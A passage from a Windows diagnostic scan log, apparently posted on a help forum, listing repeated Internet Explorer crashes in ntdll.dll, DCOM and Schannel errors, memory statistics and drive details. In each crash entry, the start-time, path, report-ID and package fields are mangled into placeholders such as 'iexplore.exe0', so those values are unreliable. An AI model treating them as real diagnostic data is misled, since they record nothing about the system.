System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object) at System.Management.Automation.DlrScriptCommandProcessor.Complete() at System.Management.Automation.CommandProcessorBase.DoComplete() at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase) at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, 
Boolean) at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper() at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc() at System.Management.Automation.Runspaces.PipelineThread.WorkerProc() at System.Threading.ThreadHelper.ThreadStart_Context(System.Object) at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object) at System.Threading.ThreadHelper.ThreadStart() Error: (11/30/2014 07:39:05 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010a55f Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a Exception code: 0xc0000005 Fault offset: 0x00061206 Faulting process id: 0x1f5ec Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (11/30/2014 07:20:52 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010a862 Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a Exception code: 0xc0000005 Fault offset: 0x00061206 Faulting process id: 0x6c90 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (11/30/2014 07:19:12 PM) (Source: Application Error) 
(EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010888a Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a Exception code: 0xc0000005 Fault offset: 0x00061206 Faulting process id: 0x2923c Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5

System errors:
=============
Error: (11/30/2014 09:08:33 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/30/2014 09:08:02 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/30/2014 09:07:31 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/30/2014 09:07:00 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/30/2014 09:00:52 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 51. The Windows SChannel error state is 900.

Error: (11/30/2014 08:56:02 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/30/2014 08:55:31 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/30/2014 08:55:00 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/30/2014 08:54:29 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/30/2014 08:53:58 PM) (Source: DCOM) (EventID: 10010) (User: JasonStorm)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Microsoft Office Sessions:
=========================

==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5-3210M CPU @ 2.50GHz
Percentage of memory in use: 28%
Total physical RAM: 8074.77 MB
Available physical RAM: 5737.82 MB
Total Pagefile: 16266.77 MB
Available Pagefile: 13875.43 MB
Total Virtual: 8192 MB
Available Virtual: 8191.78 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:671.53 GB) (Free:279.17 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive d: (RECOVERY) (Fixed) (Total:26.33 GB) (Free:3.11 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 04463ED8)
Partition: GPT Partition Type.

==================== End Of Log ============================
[/QUOTE]